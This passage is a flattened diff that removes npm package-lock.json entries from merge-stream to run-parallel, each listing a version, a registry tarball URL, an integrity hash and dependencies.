"resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", - "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", - "dev": true, - "dependencies": { - "braces": "^3.0.3", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/minizlib/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/minizlib/node_modules/glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - }, - "bin": { - "glob": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minizlib/node_modules/minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minizlib/node_modules/rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "dependencies": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/optionator": { - "version": "0.9.3", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.3.tgz", - "integrity": "sha512-JjCoypp+jKn1ttEFExxhetCKeJt9zhAgAve5FXHixTvFDW/5aEktX9bufBKLRRMdU7bNtpLfcGu94B3cdEJgjg==", - "dev": true, - "peer": true, - "dependencies": { - "@aashutoshrathi/word-wrap": "^1.2.3", - "deep-is": "^0.1.3", - "fast-levenshtein": "^2.0.6", - "levn": "^0.4.1", - "prelude-ls": "^1.2.1", - "type-check": "^0.4.0" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", - "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", - "dev": true, - "peer": true, - "dependencies": { - "p-limit": "^3.0.2" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "node_modules/parent-module": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", - "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", - "dev": true, - "dependencies": { - "callsites": "^3.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.18" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/path-scurry/node_modules/lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, - "node_modules/path-type": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", - "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "node_modules/picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pkg-dir/node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pkg-dir/node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pkg-dir/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/pkg-dir/node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/prelude-ls": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", - "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "node_modules/punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/queue-microtask": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", - "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ], - "peer": true - }, - "node_modules/react-is": { - "version": "18.3.1", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", - "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-cwd/node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", - "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/reusify": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", - "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==", - "dev": true, - "peer": true, - "engines": { - "iojs": ">=1.0.0", - "node": ">=0.10.0" - } - }, - "node_modules/rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" - }, - "node_modules/rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dev": true, - "peer": true, - "dependencies": { - "glob": "^7.1.3" - }, - "bin": { - "rimraf": "bin.js" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/run-parallel": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", - "integrity": 